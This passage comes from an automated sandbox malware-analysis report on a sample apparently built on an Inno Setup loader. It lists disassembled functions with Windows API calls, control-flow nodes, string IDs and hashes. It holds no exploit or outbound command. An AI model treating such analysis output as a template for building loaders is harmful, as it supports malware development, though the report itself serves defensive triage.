                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                      • API String ID: 3341979996-3001827809
                                                                                                      • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                      • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                                                      • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                      • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D
                                                                                                      Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                      • API String ID: 1646373207-2130885113
                                                                                                      • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                      • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                                                      • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                      • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D
                                                                                                      Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                      • SetWindowLongA.USER32(00020420,000000FC,00409918), ref: 0040A148
                                                                                                        • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                                        • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                        • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                        • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                        • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90), ref: 00409A5C
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                      • 73A15CF0.USER32(00020420,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                      • API String ID: 978128352-3001827809
                                                                                                      • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                                      • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                                                      • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                                      • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D
                                                                                                      Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90,00000000), ref: 00409A28
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                      • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021B15A4,00409A90), ref: 00409A5C
                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,021B15A4), ref: 0040966C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                      • String ID: D
                                                                                                      • API String ID: 3356880605-2746444292
                                                                                                      • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                                      • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                                                      • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                                      • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69
                                                                                                      Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: .tmp$y@
                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                      • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                                      • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                                                      • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                                      • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED
                                                                                                      Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: .tmp$y@
                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                      • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                      • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                                                      • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                      • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD
                                                                                                      Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: .tmp
                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                      • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                      • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                                                      • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                      • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5
                                                                                                      Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 332 40778a-40778f 330->332 333 4077fd-407802 330->333 334 40783b-40783d 331->334 335 4077fb 331->335 338 407803-407819 332->338 340 407791-407792 332->340 333->338 339 407841-407843 334->339 335->333 341 40785b-40785c 338->341 349 40781b 338->349 339->341 344 407724-407741 340->344 345 407794-4077b4 340->345 342 4078d6-4078eb call 407890 InterlockedExchange 341->342 343 40785e-40788c 341->343 366 407912-407917 342->366 367 4078ed-407910 342->367 359 407820-407823 343->359 360 407890-407893 343->360 348 4077b5 344->348 350 407743 344->350 345->348 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->334 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->334 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                      • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                                      • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                      • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                                                                      Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2987862817-0
                                                                                                      • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                      • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                      • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                      • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                      Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                      • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                      • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                      • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                                      Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1948546556-0
                                                                                                      • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                      • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                      • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                      • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                      Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                      • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                      • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                      • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                      Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2087232378-0
                                                                                                      • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                      • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                      • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                      • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                      Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                                        • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                                        • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1658689577-0
                                                                                                      • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                      • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                                      • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                      • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                                      Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
